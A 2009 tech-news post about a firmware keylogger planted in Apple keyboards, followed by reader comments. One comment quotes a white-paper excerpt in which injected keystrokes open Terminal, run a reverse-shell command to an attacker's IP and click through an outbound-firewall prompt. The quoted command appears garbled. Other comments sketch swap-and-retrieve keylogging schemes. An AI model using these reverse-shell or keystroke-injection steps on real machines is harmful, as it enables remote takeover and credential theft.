Apple keyboard gets hacked like a ripe papaya, perp caught on video
As far as Apple is concerned, the Black Hat 2009 hackers conference didn't end soon enough. Having promptly patched the iPhone vulnerability, Cupertino is facing another security hole, this time in its keyboards. A hacker going by the pseudonym of K. Chen has come up with a way, using HIDFirmwareUpdaterTool, to inject malicious code into the keyboard's firmware. While it's not yet possible to perform this hack remotely, the fact it occurs at the firmware level means no amount of OS cleanser or anti-virals will remedy it -- which might be a bit of a bother to MacBook owners who can't simply swap to an uninfected keyboard. Panic is hardly advisable, as Chen is collaborating with Apple on a fix, but if you want to be freaked out by his simple keylogger in action, hit up the video after the break.
Wait. Is this concerning external keyboards, internal keyboards, or just the way that the Macs talk to keyboards?
External keyboards at least, but most likely internal ones too. It has nothing to do with the way Macs talk to them since the hacked keyboards function the same way on PCs.
I doubt the keyboard has a lot of space for storing keystrokes. It probably has the bare minimum amount of space to fit the firmware.
I could see it being potentially dangerous, though, if it was triggered by a specific username and only stored the dozen or so characters that came after it.
8kb is flash; it has only 256 bytes of working memory.
Just read the white paper and here is an example of the exploits usefulness:
http://www.blackhat.com/presentations/bh-usa-09/CHEN/BHUSA09-Chen-RevAppleFirm-PAPER.pdf
*** An Excerpt From the White Paper ***
"As an example, the keyboard could send the following keystrokes: COMMAND-SPACE, followed by terminal and RETURN, then followed by exec /bin/sh 0&0 2>&0 and RETURN, where 127.0.0.1 is of course replaced by the IP address of the attacker’s machine. In Mac OS X, COMMAND-SPACE activates Spotlight and terminal is typed into the Spotlight search box to launch the terminal application. Then exec is used to send a shell back to the attacker [14]. The above command just sends a shell back to port 4444 on localhost. The firewall in the Mac OS X Leopard operating system is by default not enabled, and in any case, does not block outgoing connections. In the event that the user uses an outbound firewall like Little Snitch, an extra RETURN at the end of the above sequence of keystrokes will select the default option of allowing the outbound TCP connection from Terminal.app."
@Paul
You need to go back to great school to learn your numbers. 8K = 8 x 1024 = 8192 characters.
@the observer: That was a bit unnecessary. At any rate, I think what Paul meant when he said characters was actual characters, like ABC123, not bits and what-not. Oh yeah, learn what tact is at this "great school".
What the hell are you talking about. 8K is only 2 characters.
Whether or not it's a practical attack, or the keyboard can store enough data to be useful, the idea is genius-level creativity (to me, at least). Awesome.
Back in DOS days, TRS (terminate and state resident) self replicating virus was written in 407 bytes of code. Where there is a will, there is a way!
I always find hacks interesting. I just don't see how someone finds this stuff out. Seems like they have too much time on their hands.
I'm a registered fanboy, and I still don't care.
You realize this has nothing to do with the OS; rather it has something to do with the HARDWARE. Granted it is an Apple keyboard in this video, but this could theoretically happen to almost any keyboard. Please refrain from starting a flame war.
There is no additional risk to this hack. In order to get the stored keys off your system, a hacker would have to have code running as administrator on your machine. And if he has code running as administrator on your machine, he doesn't need to hack your keyboard to capture your keystrokes.
I never said it was tough to get administrator. Simply that in order to use this device to steal information remotely, you need to get administrator. And if you can get administrator, you don't need this device at all. It's a non-issue for remote hacking.
It could be used locally, having the keyboard steal keystrokes and then you come back later to the machine and get it to replay their password into a text window.
you clearly don't get the difference between OS and keyboard firmware ...
CLICK IT AGAIN, JIMBO!!
not me, it's AT&T DSL in san francisco
@ethana2:
You fvcking crack me up.
Yeah that's why every year when they have that Hackathon the Mac falls in seconds.
If the data is stored in the keyboard, it should be sufficient to swap the keyboard.
Unless I've misread, the following scenario is a possibility:
1. Swap keyboard against infected one.
2. Log login data
3. Swap keyboard against original one.
4. Read login data
5. ???
6. Profit!
couldn't you sell the keyboard to somebody with the firmware preloaded? Buy it from bestbuy, load firmware, return it, keep trying every day until you get a response.
@Brian
Right-
Step 1: Buy keyboard
Step 2: Hack keyboard
Step 3: Return keyboard
Step 4: Break into the house of the person who bought the keyboard and take it home with you so you can look at the logged keystrokes.
It's f*cking foolproof.
@Mmmm... Dohnuts
You could send the information to a webserver via terminal.
hey donuts - stop eating and read the F'in article - just set it up to send out the info via this little thingy called the interwebZ
@Kristofer & phenoum
That WOULD be ideal, if that was how this hack worked. Watch the f'in' video guys. It's a local keylogger, not a computer controlling keyboard from hell that has any form of internet access. You each earn one phail.
@Mmmm... Dohnuts.
Search for "http://www.blackhat.com/presentations/bh-usa-09/CHEN/BHUSA09-Chen-RevAppleFirm-PAPER.pdf" on the first comment page. Read the whitepaper excerpt below it. The keyboard doesn't need to have internet access. All you need is for the keyboard to be connected to a computer that has internet access.
I think Jimbo has an infected keyboard.
Apple welcome to the real world.
I can't hear you! I am within Steve's reality distortion field! :P
"Since when was Apple in a "fake" world?"
Starting the second Apple fans began telling us that Apple's products are un-hackable. Every product has issues; more users = more hackers.
@ Jimbo
Only ardent Winboy fans fabricate stories of Apple fans saying Macs are un-hackable in order to attack them. Just like you.
Good job dumbass.
@FoxKenji
I know quite a few people who bought Apple computers because they heard from other Apple users that Macs are pretty much invulnerable to hacks and viruses. So his "story" is not fabricated, making you the dumbass.
@EB
Wow that's one hell of a solid argument..."I know people who heard from other people that Macs are unhackable." Most Mac users are like most Windows users: non-extremist. Not every Mac user is stupid enough to think that their computer is unhackable, and you know that.
Of course I know that, and I didn't say ALL Mac users claim that OSX was invulnerable did I? I am just saying that there are very naive people both on Windows and Mac OS side, who believe that there is such thing as a perfect piece of software, which is simply not true.
Alex, come on. This is the number 1 reason why people who are in the tech business buy Macs. Yes, you are different and know what, why, where ... remember the discussions a few months ago about the note Apple posted on their site that you need antivirus, and the storm of comments about how the Mac is safe?
You can see even posts here in this topic about "unbreakable access to Macs" ... Windows users are sick of these comments because we all know that OSX has more holes than Swiss cheese. When we point it out, you get all pissy and offensive.
all your keyboards are belong to us
lol i love hearing about apple security flaws.
naturally windows has its share, but the stupid things that people find on apple devices make me chuckle :)
At least Apple flaws get fixed in a timely fashion. I'd rather have a widely known issue arise from a simple-to-understand flaw and know it's being fixed in future revisions than have a cluster-fsck of driver, firmware, and dll-hell caused by a hundred different, mostly incompetent, companies that results in no one having a clue where the flaws are.
+1 lordmorgul
@lordmorgul
Actually, Windows patch time is much faster than Mac (13 times faster), so your argument is as dumb as your fanboyism.
http://news.softpedia.com/news/Windows-vs-Apple-Mac-OS-X-vs-Red-Hat-Linux-82966.shtml
"Of the five operating systems assessed in the last six months of 2007, Microsoft Windows had the shortest average patch development time of six days based on a sample set of 22 patched vulnerabilities. None of the vulnerabilities affected third-party applications. This is shorter than the average patch development time of 18 days in the first six months of 2007, based on a sample set of 38 vulnerabilities, including two vulnerabilities that affected third-party applications," Symantec revealed.
Apple, the maker of Mac OS X, not only had to plug more vulnerabilities in its operating system compared to Windows, but also spent approximately 13 times as much as Microsoft doing it. "Apple had the fourth shortest average patch development time during this reporting period. Its average was 79 days for 86 vulnerabilities, including 47 third-party vulnerabilities. This period is longer than the 43-day average recorded in the first six months of 2007, during which the average was calculated from a sample set of 59 vulnerabilities, nine of which affected third-party applications," Symantec revealed.
taped up iSight FTW
HAHAHAHAHAAHAHAHA LMAO
You know what it is: at a hacker conference you can't be too careful,
so forget disabling drivers and shit and just go with it the hard way.
How is that the hard way? Looks pretty easy to me.
We didn't start the flame war.
Well, this hack is pretty useless against me since after typing my login passwords I type plenty more than 1KB worth of characters. So all you'd get is a backwards version of my engadget comments.
Then again my comments are pure gold!
Dateline NBC needs to lure in the pervs with underage gadgets dressed in cute little pants.
AnnoyingPoster, you are an idiot.